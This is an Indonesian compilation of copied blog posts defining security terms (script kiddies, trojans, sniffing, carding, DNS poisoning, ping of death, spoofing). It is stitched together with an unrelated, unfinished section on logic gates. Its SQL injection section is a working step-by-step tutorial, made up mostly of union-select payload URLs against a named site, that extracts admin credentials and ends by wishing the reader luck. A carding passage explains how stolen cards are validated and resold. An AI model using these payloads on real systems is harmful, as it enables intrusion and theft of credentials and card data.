Definisi Script Kiddie

Script Kiddie adalah seseorang yang memiliki kemampuan kurang dalam dunia internet yang hanya bisa menggunkan tools orang lain untuk melakukan serangan terhadap jaringan internet, biasanya hanya untuk sensasi. Pada zaman sekarang ini menjadi seorang Script Kiddie tidak lah susah karena hanya dengan bermodal koneksi internet dan mengerti sedikit tentang komputer,

Def inisi Script Kiddie
Di dunia hacker sendiri, Seorang Script Kiddie diartikan sebagai seseorang dengan niat buruk yang menggunakan program  lain untuk menyerang sistem komputer atau pun melakukan deface pada website. Di sebut seorang script kiddie bukan lah sebuah kebanggaan, biasanya diasumsikan sebagasi seorang anak (kid) yang kurang memiliki kemampuan untuk membuat tools sendiri dan biasanya hanya bertujuan untuk membuat sensasi. Bagaimana pun hal ini dapat menimbulkan banyak masalah bagi para pengguna komputer dan kita yang sering menggunakan internet, biasanya seorang script kiddie mencari target buka dengan memilih target tetapi lebih mengandalkan hasil scan dari tools yang mendeteksi kelemahan sebuah sistem pada umumnya. Cepat atau lambat tools yang digunakan Seorang script kiddie akan memberikan hasil scan dari sebuah sistem yang lemah yang nantinya dapat diserang dengan mudah, nah dari dasar itu lah Seorang Script Kiddie menjadi ancaman, siapapun dapat menjadi target selanjutnya karena Script Kiddie tidak menentukan korban tetapi menggunakan hasil scan dari sebuah tools yang mendeteksi kelemahan sebuah sistem.

Senjata Yang Di Gunakan Script Kiddie Di Zaman ini apa pun sangat mudah di temukan di internet, sama juga dengan senjata andalan Script Kiddie. Banyak sekali tools yang bisa di download di internet dan dapat di gunakan dengan mudah walau pun digunakan orang awam sekali pun seperti saya ini. Satu yang sangat sederhana yaitu dengan cara menscan IP/web untuk mencari kelemahan sistem yang dapat di serang dengan mudah, untuk menjadi Seorang script kiddie. Seseorang tidak usah kerja hingga larut malam karena banyak tools yang bekerja secara otomatis jadi bisa kita tinggal beraktivitas dan kita tinggal menunggu hasil scan dari sebuah tool.

Hal buruk yang dapat terjadi Sekali sistem anda lemah maka penyusup akan langsung masuk dan menyerang sistem anda dengan tanpa ada rasa kasih sedikit pun. Dibawah ini adalah sedikit hal buruk yang dapat terjadi jika sebuah sistem telah di serang:
1. Deface Web
Setelah penyusup lalu berhasil masuk ke web serve dan
mempunyai akses penuh di sebuah webs, biasanya yang di lakukan
seorang script kiddie adalah mengganti halaman utama sebuah web
dengan id nick name beserta pesan yang ditujukan buat admin web
tersebut.
Tidak hanya itu banyak para penyusup mengobrak-ngabrik isi
web sehingga web tidak lagi bisa di akses oleh pengunjung atau
tidak berjalan dengan baik lagi. hal tersebut merupakan sebuah
prestasi bagi seorang script kiddie.
2. Menginfeksi sistem
Salah satu contohnya melalui virus atau pun worm yang di
sebar melalui internet yang nantinya virus atau worm yang
menginfeksi sebuah komputer akan menggubah sisitem, menggambil
file-file penting yang ada pada komputer atau merusak total
sebuah computer hingga tidak bisa digunakan kembali.
3. Mengambil password
Password dengan strong type ( mempunyai password yang sulit di
tebak ) kadang tidak berdaya jika script kiddie telah
menjalankan program keylogger atau sebuah program yang dapat
meng-enskrip sebuah password

Jika seorang script kiddie telah mendapatkan akses penuh,
maka mereka dapat sesuka hati melakukan hal apa saja, contohnya
seperti menghaspus atau mencuri file-file sangat penting.
Bayangkan jika file-file penting anda atau file-file
sensitif lainnya dicuri oleh orang lain jika computer anda
diserang oleh penyusup.
Proteksi-proteksi
Sebuah serangan terjadi karena adanya sebuah kelemahan
maka dari itu kita harus melakukan proteksi-proteksi berdasarkan
metode serangan.
1. Minimalisasi sistem
Salah satu celah keamanan yang dapat di susup oleh
penyerang adalah melalui service atau program yang sedang
berjalan pada sistem di computer anda. Karena itu pastikan kita
meminimalis service atau program yang berjalan di komputer anda.
Dan anda dapat menonaktifkan service atau program yang tidak di
digunakan atau diperlukan.
2. Manajemen password
Hal yang harus anda lakukan hanyalah berhati-hati jika
anda ingin membuat sebuah password yang umum seperti : “admin”,
“1234”, “qwerty”, bahkan ‘p@$$w0rd” dan masih banyak password
yang mempunyai tingkat kesulitan yang sangat mudah di tebak.
Sepertinya kebobolan hanya tinggal menunggu
Kini dengan hanya menggunakan search eingine seorang
script kiddie dapat menemukan sebuah database yang berisi
kumpulan-kumpulan password dan hal-hal lain yang bersifat
sensitif
3. Gunakan firewall
Setidaknya dengan kita menggunakan firewall dapat
melindungi serangan yang datang dari port yang di ijinkan oleh
firewall biasanya port 80 yang pada umumnya digunakan sebagai
web serve. Firewall juga dapat menutupi kelemahan-kelemahan
sebuah sistem.
4. Gunakan tools
Jika seorang script kiddie menggunakan tools untuk
menyerang maka gunakan hal yang sama untuk mengetahui sistem
anda sendiri.3T ools yang didesain untuk mencari kelemahan sistem di
sebut vulnerability scanner. Biasanya software ini akan
melakukan scan IP address, sistem operasi, dan aplikasi yang
berjalan lalu akhirnya menentukan update pada operasi sistem dan
aplikasi yang memiliki kelemahan.

5. Selalu update
Update selalu program-program yang anda bisa gunakan,
karena biasanya banyak sekali program yang masih banyak memiliki
masalah karena hal ini dapat menjadi boomerang bagi sistem jika
ditemukan crash pada program.

Sumber : http://tkjsmkn1slawi.forumotion.com/t77-mengenal-script-kiddie

Definisi SQL Injection

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

===========
= Step Satu:  =
===========
carilah target
misalkan: http//www.snipp55.com/berita.php?id=100
Tambahkan karakter ( ‘ ) pada akhir url atau menambahkan karakter ( – ) untuk melihat apakah ada pesan error.
contoh:
http//www.snipp55.com/berita.php?id=100′ atau
http//www.snipp55.com/berita.php?id=-100
sehingga muncul pesan error seperti berikut :
” Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/classes/storedProcedures/GetArticleData.class.php on line 92 “
(dan masih banyak lagi pesan error yg lainnya)

==========
= Step Dua: =
==========
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by
contoh:
http//www.snipp55.com/berita.php?id=-100+order+by+1–  atau
http//www.snipp55.com/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…
misal:
http//www.snipp55.com/berita.php?id=-100+order+by+1–
http//www.snipp55.com/berita.php?id=-100+order+by+2–
http//www.snipp55.com/berita.php?id=-100+order+by+3–
http//www.snipp55.com/berita.php?id=-100+order+by+4– dst
sehingga muncul pesan error…
misal pesan errornya muncul di table 9 :
http//www.snipp55.com/berita.php?id=-100+order+by+9–
berarti table yang terdapat dalam database adalah 8
menjadi http//www.snipp55.com/berita.php?id=-100+order+by+8–

===========
= Step Tiga:   =
===========
mencari nomor keberuntungan dengan menggunakan perintah union select
karena tadi tablenya hanya ada 8
maka: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–
ok seumpama yg keluar adalah angka 5
maka gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai, masukan perintah tsb pada angka yg keluar tadi
misal: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
lalu lihat versi database yg digunakan seumpama versi 4 maka tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema
jika versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema

============
= Step Empat:=
============
menampilkan table yg ada pada web tsb dengan
perintah group_concat(table_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()–        >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–
ibaratkan yang muncul adalah table  “admin”

===========
= Step Lima:=
===========
menampilkan kolom yang terdapat di table “admin”
perintah group_concat(column_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.columns+where+table_name=Oxhexa–       >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Oxhexa–
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://home2.paulschou.net/tools/xlate/
contoh kata yg ingin di konversi yaitu “admin” (tanpa tanda kutip) maka akan menjadi 61646d696e
maka : http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Ox61646D696E–
ibaratkan yang muncul adalah column username,password,email

============
= Step Enam : =
============
memunculkan apa yg tadi telah dikeluarkan dari column yaitu dengan cara
perintah concat_ws(Ox3a,hasil isi column yg akan dikeluarkan)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+(nama table berasal)          >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,column yang akan dilihat isinya),6,7,8+from+(nama table)–
contoh column yang keluar td adalah column username,password,email
Maka :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,username,Ox3a,password,Ox3a,email),6,7,8+from+admin–
contoh yang keluar :
admin:an4kal4y:alay_alay@alay.com
cara membaca nya seperti berikut :
username : admin
password : an4kal4y
email : alay_alay@alay.com

==============
= Step Tujuh    :   =
==============
tahap terakhir yang harus dilakukan adalah mencari halaman admin atau login (adminlogin).
website yang menyediakan program pencarian login admin :
http://revtan.site40.net/admin/?
Selamat Mencoba

Sumber : http://snipp55.wordpress.com/2010/12/01/pengertian-sql-injection-dan-langkah2nya/

Pengertian Trojan Horse

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan yang dapat merusak sebuah sistem atau jaringan.Tujuan dari Trojan adalah memperoleh informasi dari target dan mengendalikan target untuk memperoleh hak akses pada target. Trojan bersifat "stealth" atau siluman dan tidak terlihat dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik. Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna. Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM) dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna misalnya: password , data kartu kredit , dan lain- lain.
Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan. Ada lagi sebuah jenis Trojan yang dapat mengimbuhkan dirinya sendiri ke sebuah program untuk memodifikasi cara kerja program yang diimbuhinya. Jenis Trojan ini disebut sebagai Trojan virus . Software jahat dan anti software jahat terus berkembang saling adu kuat. Ketika serangan virus, trojan horse dan malware lain dapat diatasi oleh sebuah sistem pengamanan, serangan berikutnya sebagai respon terhadap sistem pengamanan tersebut datang lagi dengan kemampuan yang lebih tinggi.

Berikut 5 jenis trojan horse yang tehnik serangannya dengan cara mengelabui sistem pengamanan :

 1. GLIEDER TROJAN=> Glieder trojan menggunakan proses penularan bertingkat, dimana tahap pertamanya adalah sebuah program malware kecil akan berubah secara terus menerus, sehingga program anti-virus yang terpasang dalam PC tidak akan mengenalinya sebagai malware. Begitu glieder trojan terinstal dalam PC, program ini akan berusaha menghilangkan kemampuan sistem pengamanan yang terpasang, baru setelah itu melakukan aktifitas jahatnya seperti memindahkan atau mencuri data penting, atau aktifitas lainnya sesuai keinginan penyerang.

 2. GOZI TROJAN WEBSITES=> Trojan jenis ini dapat menggunakan secure cocket layer (SSL) untuk menyandi dan mengamanankan data penting dan sensitif seperti on-line banking atau transaksi on-line. Ciri-ciri website yang menggunakan SSL adalah adanya gambar gembok di address bar. Gozi trojan akan menghindari pengamanan ini (SSL) dengan cara mengelabui OS Windows, sehingga seakan- akan dia adalah bagian dari proses SSL. Yang terjadi adalah data meninggalkan browser melalui gozi trojan sebelum data tersebut disandikan dan dikirimkan keluar PC menuju network. Program jahat ini memang tidak seperti trojan pada umumnya, dia masuk sampai ke operating system dengan mengelabui layered service providers (LSPs).

3. SPAMTHRU TROJAN=> Program jahat ini berlaku seolah-oleh sebuah program anti-virus tambahan, sehingga dapat dikatakan ?malware" yang melakukan scanning malware dalam PC?. Bila PC memasang anti-virus baru yang lebih baik, dia akan memblok malware ini agar tidak bisa melakukan up-date yang dapat mengubah dirinya menjadi malware lain.

4. SPYAGNT TROJAN=> Program ini bermain di area penyandian file dalam windows , yaitu ketika kita melakukan penyandian dengan fasilitas yang disediakan oleh windows. SpyAgent ini memposisikan dirinya sebagai user account tingkat administrator, dan menggunakan account tersebut untuk menyandi file-file. Program anti-virus yang terpasang tidak akan mendeteksi adanya file yang sudah disusupi program jahat.

5. JOWSPRY TROJAN=> Jowspry trojan mengelabui PC dengan dengan, seolah-olah sebai sebuah program yang memang sudah dikenal dan diakui oleh PC, yaitu windows up-date. Program ini akan melakukan koneksi seperti background intelligent transfer service yang digunakan oleh program windows up-date, sehingga tidak ditangkal oleh program firewall yang terpasang dalam PC. Seolah mengatakan ?hai firewall, saya windows up- date. Untuk mengantisipasi kehadiran trojan-trojan tersebut agar tidak bersarang dalam PC atau tidak memberi kesempatan pada trojan untuk beraksi, perlu melakukan pengantisipasian : selalu up-date windows dan program aplikasinya. usahakan tidak membuka attachement atau mengklik link dalam e-mail yang tidak jelas. dan gunakan selalu program anti- virus yang baik. Selain Trojan yang menyerang PC, sebenarnya ada Trojan yang menyerang perangkat seluler. Dalam hal ini yang menggunakan operating system (OS). Dan yang perlu di ketahui, perangkat seluler yang sering dan bahkan menjadi sasaran empuk Trojan adalah jenis Symbian. Dan terutama adalah jenis Symbian s60v2. Jika anda pengguna Symbian jenis tersebut, maka selalu pasang anti-virus pada perangkat seluler anda. Maka tak heran jika ada yang menyebutkan s60v2 adalah Hp virus. Selain Trojan, masih banyak varian virus yg dapat menginfeksi perangkat seluler, seperti halnya pada PC.

Cara kerja Trojan Horse
Trojan masuk melalui dua bagian, yaitu bagian client dan server. Jadi hacker kadang harus berjalan menanamkan trojannya di komputer korban ataupun memancing agar sang korban mengeksekusi/membuka file yang mengandung Trojan, namun ada juga Trojan yang langsung menginfeksi korbannya hanya dengan berbekal ip korban misalnya Kaht. Ketika korban (tanpa diketahui) menjalankan file yang mengandung Trojan pada komputernya, kemudian penyerang akan menggunakan client untuk koneksi dengan server dan mulai menggunakan trojan. Protokol TCP/IP adalah jenis protokol yang umum digunakan untuk komunikasi. Trojan dapat bekerja dengan baik dengan jenis protokol ini, tetapi beberapa trojan juga dapat menggunakan protokol UDP dengan baik. Ketika server mulai dijalankan (pada komputer korban), Trojan umumnya mencoba untuk menyembunyikan diri di suatu tempat dalam sistem komputer tersebut, kemudian mulai membuka beberapa port untuk melakukan koneksi, memodifikasi registry dan atau menggunakan metode lain yaitu metode autostarting agar trojan menjadi otomatis aktif saat komputer dihidupkan. Trojan sangat berbahaya bagi pengguna komputer yang tersambung jaringan komputer atau internet, karena bisa jadi hacker bisa mencuri data-data sensitif misalnya password email, dial-up passwords, webservices passwords, e-mail address, dokumen pekerjaan, internet banking, paypal, e-gold,kartu kredit dan lain-lain.
 Cara mengatasi bahaya Trojan

Pertama lakukan langkah pendeteksian keberadaan Trojan pada komputer. Pendeteksian Trojan dapat dilakukan dengan cara-cara sebagai berikut
1. Task List
Pendeteksiannya dengan melihat daftar program yang sedang berjalan dalam task list. Daftar dapat ditampilkan dengan menekan tombol CTRL+ALT+DEL atau klik kanan pada toolbar lalu klik task manager. Selain dapat mengetahui program yang berjalan, pemakai dapat melakukan penghentian terhadap suatu program yang dianggap aneh dan mencurigakan.
Namun beberapa Trojan tetap mampu menyembunyikan dari task list ini. Sehingga untuk mengetahui secara program yang berjalan secara keseluruhan perlu dibuka System Information Utility(msinfo32.exe) yang berada di C:\Program files\common files\microsoft shared\msinfo. Tool ini dapat melihat semua proses itu sedang berjalan, baik yang tersembunyi dari task list maupun tidak. Hal-hal yang perlu diperiksa adalah path, nama file, properti file dan berjalannya file *.exe serta file *.dll.

2. Netstat
Semua Trojan membutuhkan komunikasi. Jika mereka tidak melakukan komunikasi berarti tujuannya sia-sia. Hal ini adalah kelemahan yang utama dari Trojan, dengan komunikasi berarti mereka meninggalkan jejak yang kemudian dapat ditelusuri. Perintah Netstat berfungsi membuka koneksi ke dan dari komputer seseorang. Jika perintah ini dijalankan maka akan menampilkan IP address dari komputer tersebut dan komputer yang terkoneksi dengannya. Jika ditemukan IP address yang tidak dikenal maka perlu diselidiki lebih lanjut, mengejar dan menangkapnya.

3. TCP View
TCPVIEW adalah suatu free utility dari Sysinternals yang mempunyai kemampuan
menampilkan IP address dan menampilkan program yang digunakan oleh orang lain untuk koneksi dengan komputer pemakai. Dengan menggunakan informasi tersebut, maka jika terjadi penyerangan dapat diketahui dan dapat melakukan serangan balik. Langkah penghapusan Trojan Trojan dapat dihapus dengan: Menggunakan Software Anti-Virus. Sebagian antivirus dapat digunakan untuk mengenali dan menghapus Trojan. Menggunakan Software Trojan Scanner, software yang di khususkan untuk mendeteksi dan menghapus Trojan Cara yang paling sadis yah diinstal ulang komputernya.

Langkah pencegahan Trojan
Trojan menyusup di komputer anda, pastikan anda memasang antivirus yang selalu terupdate,
mengaktifkan Firewall baik bawaan dari Windows atau dari luar. Selalu waspadalah
jika komputer anda mengalami sesuatu kejanggalan. Hindari penggunaan sofware ilegal
karena sering tanpa kita sadari software tersebut mengandung Trojan, downloadlah software
dari situs-situs yang benar-benar dapat dipercaya.

Sumber : http://poutry9.blogspot.com/2012/12/pengertian-virus-trojan-horse.html

Pengertian Sniffer

Sniffer adalah program yang membaca dan menganalisa setiap protokol yang melewati mesin di mana program tersebut diinstal. Secara default, sebuah komputer dalam jaringan (workstation) hanya mendengarkan dan merespon paket-paket yang dikirimkan kepada mereka. Namun demikian, kartu jaringan (network card) dapat diset oleh beberapa program tertentu, sehingga dapat memonitor dan menangkap semua lalu lintas jaringan yang lewat tanpa peduli kepada siapa paket tersebut dikirimkan. Aktifitasnya biasa disebut dengan sniffing.

Untuk dapat membaca dan menganalisa setiap protokol yang melewati mesin, diperlukan program yang bisa membelokkan paket ke komputer attaker. Biasa disebut serangan spoofing. Attaker akan bertindak sebagai Man-In-the-Middle (MIM).

Gambar di atas mengilustrasikan koneksi TCP yang sebenarnya, tanpa ada sebuah host yang bertindak sebagai MIM. Kemudian host attacker menjalankan program Spoofing, berarti host attacker akan bertindak sebagai host yang dilewati data antara host client dan host server.

Setelah host attacker menjadi host yang berada di tengah-tengah dari dua host yang saling berkomunikasi, kemudian attacker melakukan analisa traffic dengan menjalankan program ethereal. Dengan menganalisa traffic TCP yang sudah tercapture, attacker dapat mengetahui apa saja yang dilakukan oleh host client terhadap host server.
 Sumber : http://badaiardiat.blogspot.com/2011/02/pengertian-sniffer.html

Pengertian Carding

Carding adalah istilah yang digunakan untuk proses verifikasi keabsahan data kartu kredit yang dicuri oleh carder. Pencuri memberi informasi kartu pada situs Web yang memiliki real-time proses transaksi. Jika kartu berhasil diproses, pencuri tahu bahwa kartu masih bisa digunakan. Item spesifik yang dibeli dengan kartu kredit yang dicuri biasanya tidak penting, dan pencuri tidak perlu membeli produk riil, biasanya digunakan untuk mendaftar member sebuah situs web atau sumbangan amal. Pembelian biasanya hanya dalam jumlah uang kecil, baik untuk menghindari penggunaan batas kartu kredit, dan juga untuk menghindari kecurigaan  penerbit dan pemilik kartu kredit. Sebuah situs web yang diketahui rentan terhadap carding dikenal sebagai website cardable.

Di masa lalu, carders menggunakan program komputer yang disebut "generator" untuk menghasilkan urutan nomor kartu kredit secara acak, dan kemudian menguji mereka untuk melihat yang account yang valid. Variasi lainnya akan mengambil nomor kartu palsu untuk sebuah lokasi yang tidak segera memproses nomor kartu, seperti pameran dagang atau peristiwa khusus. Namun, proses ini tidak lagi layak karena persyaratan luas oleh sistem kartu internet kredit pengolahan untuk data tambahan seperti alamat penagihan, 3 sampai 4 Kode Keamanan Kartu digit dan / atau tanggal kedaluwarsa kartu, serta penggunaan lebih umum scanner kartu nirkabel yang dapat memproses transaksi langsung. Saat ini, carding lebih biasanya digunakan untuk memverifikasi data kartu kredit yang diperoleh secara langsung dari korban dengan skimming atau phishing..

Satu set rincian kartu kredit yang telah diverifikasi dengan cara ini dikenal di kalangan penipuan sebagai suatu phish. Sebuah carder biasanya akan menjual file data phish untuk orang lain yang akan melakukan penipuan aktual. Harga pasar untuk phish berkisar dari US $ 1,00 menjadi US $ 50,00 tergantung pada jenis kartu, kebaruan data dan status kredit korban

sumber : http://bsicardingblog.blogspot.com/2011/11/pengertian-carding.html

Pengertian DNS Poisoning

DNS Poisoning adalah salah satu kesalahan dalam melakukan domain resolving yang diakibatkan oleh malicious application (malware,virus,worm) atau juga kesalahan aplikasi dalam konfigurasi name server, sehingga menyebabkan internet tidak bisa diakses secara normal karena permintaan resolve akan di rubah dan user akan di redirect menuju situs yang berbeda dengan situs yang sebenarnya , jika di dalam jaringan kita terkena DNS poisoning maka dapat diketahui dengan cara melakukan nslookup dan melihat authoritative DNS yang memberikan jawaban atas permintaan domain resolve, jika tidak sesuai dengan name server yang di berikan oleh ISP maka berhati-hatilah mungkin kita terkena DNS poisoning.

Bagaimana cara ataupun metode untuk mengatasi DNS Poisoning?

Ada beberapa cara untuk terhindar dari DNS Poisoning, seperti:

1. Melakukan monitoring port – port komputer yang terbuka dan analisis IP misalnya dengan IP server alamat web tujuan. Windows telah menyediakan sarana monitoring ini. Untuk mengetahui kemana saja statistik hubungan network (jaringan), dapat menggunakan perintah netstat, salah satu caranya dengan net stat-n, lalu lihat layar (netstat-n) untuk mengetahui IP alamat web tujuan dan port yang digunakan.

2. Menggunakan firewall untuk mendeteksi koneksi ke dan dari komputer. Sekalipun terkadang firewall melakukan konfirmasi yang lama setiap kali komputer melakukan koneksi baru, tetapi hal ini merupakan proses yang harus dilalui jika ingin mendapatkan pengamanan optimal.

3. Monitor file host pada komputer, lokasi host ada di c:\windows\system 32\drivers\etc\hosts. Menggunakan notepad untuk membuka dan melihat isi file hosts.

Sumber : http://di22th.blogspot.com/2009/11/apr-dan-dns-poisoning.html

Pengertian Ping of Death

Ping of Death adalah jenis serangan yang menggunakan utility ping yang terdapat pada sistem operasi komputer. Ping ini digunakan untuk mengecek waktu yang aka diperlukan untuk mengirim data tertentu dari satu komputer ke komputer lainnnya. Panjang maksimum data menurut TCP protokol IP adalah 65,536  byte.

Selain itu, paket serangan Ping of Death dapat dengan mudah dispoof atau direkayasa sehingga tidak bisa  diketahui asal sesungguhnya dari mana, dan penyerangnya hanya perlu mengetahui alamat IP dari komputer yang diserangnya.Penyerang dapat mengirimkan berbagai paket ICMP yang terfragmentasi sehingga waktu paket-paket tersebut disatukan kembali, maka ukuran paket seluruhnya melebihi batas 65536 byte. Contoh sederhananya sebagai berikut:

C:\windows>ping -l 65540

Perintah MSDOS di atas melakukan ping atau pengiriman paket ICMP berukuran 65540 byte ke suatu host/server. Pada jenis serangan tersebut, data yang akan dikirim melebihi panjang maksimal yang disediakan. Jika sistem tidak siap saat penerimaan data, maka sistem akan hang, crash, atau reboot.


Sumber : http://tandtechno.blogspot.com/2011/05/pengertian-ping-of-death.html

Pengertian Spoofing

Spoofing adalah “ Teknik yang digunakan untuk memperoleh akses yang tidak sah ke suatu komputer atau informasi, dimana penyerang berhubungan dengan pengguna dengan berpura-pura memalsukan bahwa mereka adalah host yang dapat dipercaya” hal ini biasanya dilakukan oleh seorang hacker/ cracker.

Macam-Macam Spoofing
  • IP-Spoofing adalah serangan teknis yang rumit yant terdiri dari beberapa komponen. Ini adalah eksploitasi keamanan yang bekerja dengan menipu komputer dalam hubungan kepercayaan bahwa anda adalah orang lain. Terdapat banyak makalah ditulis oleh daemon9, route, dan infinity di Volume Seven, Issue Fourty-Eight majalah Phrack.
  • DNS spoofing adalah mengambil nama DNS dari sistem lain dengan membahayakan domain name server suatu domain yang sah.
  • Identify Spoofing adalah suatu tindakan penyusupan dengan menggunakan identitas resmi secara ilegal. Dengan menggunakan identitas tersebut, penyusup akan dapat mengakses segala sesuatu dalam jaringan.

Contoh Web Spoofing
Web Spoofing melibatkan sebuah server web yang dimiliki penyerang yang diletakkan pada internet antara pengguna dengan WWW, sehingga akses ke web yang dituju pengguna akan melalui server penyerang. Cara seperti ini dikenal dengan sebutan “man in the middle attack” [2,5]. Hal ini dapat terjadi dengan beberapa jalan, tapi yang paling mungkin adalah :
  • Akses ke situs web diarahkan melalui sebuah proxy server : ini disebut (HTTP) application proxy. Hal ini memberikan pengelolaan jaringan yang lebih baik untuk akses ke server. Ini merupakan teknik yang cukup baik yang digunakan pada banyak situs-situs di internet, akan tetapi teknik ini tidak mencegah Web Spoofing.
  • Seseorang menaruh link yang palsu (yang sudah di-hack) pada halaman web yang populer.
  • Kita menggunakan search engine (mesin pencari, seperti Yahoo, Alta Vista, Goggle) untuk mendapatkan link dari topik yang ingin dicari. Tanpa kita ketahui, beberapa dari link ini telah diletakkan oleh hacker yang berpura-pura menjadi orang lain. Seperti, pencarian untuk situs bank memberikan salah satu hasil http://www.kilkbca..com, sayangnya kita mungkin tidak mengetahui bahwa URL sebenarnya dari Bank BCA adalah http://www.klikbca.com
Kita menggunakan browser mengakses sebuah Web. Semua yang ada pada NET (baik Internet maupun Intranet) direferensikan dengan Universal Resource Locator (URL). Pertama-tama penyerang harus menulis-ulang URL dari halaman web yang dituju sehingga mereka mengacu ke server yang dimiliki penyerang daripada ke server web yang sebenarnya. Misalnya, server penyerang terletak di www.attacker.com, maka penyerang akan menulis-ulang URL dengan menambahkan http://www.attacker.com didepan URL yang asli. 

Sumber : http://54tr10.blogspot.com/2012/03/pengertian-spoofing.html

Keamanan jaringan

Keamanan jaringan (Bahasa Inggris: Network Security) dalam jaringan komputer sangat penting dilakukan untuk memonitor akses jaringan dan mencegah penyalahgunaan sumber daya jaringan yang tidak sah. Tugas keamanan jaringan dikontrol oleh administrator jaringan.

Segi-segi keamanan didefinisikan dari kelima point ini. 
a. Confidentiality Mensyaratkan bahwa informasi (data) hanya bisa diakses oleh pihak yang memiliki wewenang. 
b. Integrity Mensyaratkan bahwa informasi hanya dapat diubah oleh pihak yang memiliki wewenang. 
c. Availability Mensyaratkan bahwa informasi tersedia untuk pihak yang memiliki wewenang ketika dibutuhkan. 
d. Authentication Mensyaratkan bahwa pengirim suatu informasi dapat diidentifikasi dengan benar dan ada jaminan bahwa identitas yang didapat tidak palsu. 
e. Nonrepudiation Mensyaratkan bahwa baik pengirim maupun penerima informasi tidak dapat menyangkal pengiriman dan penerimaan pesan.

Serangan (gangguan) terhadap keamanan dapat dikategorikan dalam empat kategori utama : 
a. Interruption Suatu aset dari suatu sistem diserang sehingga menjadi tidak tersedia atau tidak dapat dipakai oleh yang berwenang. Contohnya adalah perusakan/modifikasi terhadap piranti keras atau saluran jaringan. b. Interception Suatu pihak yang tidak berwenang mendapatkan akses pada suatu aset. Pihak yang dimaksud bisa berupa orang, program, atau sistem yang lain. Contohnya adalah penyadapan terhadap data dalam suatu jaringan. 
c. Modification Suatu pihak yang tidak berwenang dapat melakukan perubahan terhadap suatu aset. Contohnya adalah perubahan nilai pada file data, modifikasi program sehingga berjalan dengan tidak semestinya, dan modifikasi pesan yang sedang ditransmisikan dalam jaringan. 
d. Fabrication Suatu pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contohnya adalah pengiriman pesan palsu kepada orang lain.

Ada beberapa prinsip yang perlu dihindari dalam menangani masalah keamanan :  diam dan semua akan baik-baik saja sembunyi dan mereka tidak akan dapat menemukan anda teknologi yang digunakan kompleks/rumit, artinya aman


Sumber : http://id.wikipedia.org/wiki/Keamanan_jaringan

Gerbang Logika

Gerbang Logika adalah rangkaian dengan satu atau lebih dari satu sinyal masukan tetapi hanya menghasilkan satu sinyal berupa tegangan tinggi atau tegangan rendah. Dikarenakan analisis gerbang logika dilakukan dengan Aljabar Boolean maka gerbang logika sering juga disebut Rangkaian logika.

GERBANG NOT
     Gerbang NOT atau juga bisa disebut dengan pembalik (inverter) memiliki fungsi membalik logika tegangan inputnya pada outputnya. Sebuah inverter (pembalik) adalah gerbang dengan satu sinyal masukan dan satu sinyal keluaran dimana keadaan keluaranya selalu berlawanan dengan keadaan masukan. Membalik dalam hal ini adalah mengubah menjadi lawannya. Karena dalam logika tegangan hanya ada dua kondisi yaitu tinggi dan rendah atau “1” dan “0”, maka membalik logika tegangan berarti mengubah “1” menjadi "0” atau sebaliknya mengubah nol menjadi satu. Simbul atau tanda gambar pintu NOTditunjukkan pada gambar dibawah ini.

GERBANG AND
     Gerbang AND (AND GATE) atau dapat pula disebut gate AND ,adalah suatu rangkaian logika yang mempunyai beberapa jalan masuk (input) dan hanya mempunyai satu jalan keluar (output). Gerbang AND mempunyai dua atau lebih dari dua sinyal masukan tetapi hanya satu sinyal keluaran. Dalam gerbang AND, untuk menghasilkan sinyal keluaran tinggi maka semua sinyal masukan harus bernilai tinggi.


GERBANG OR
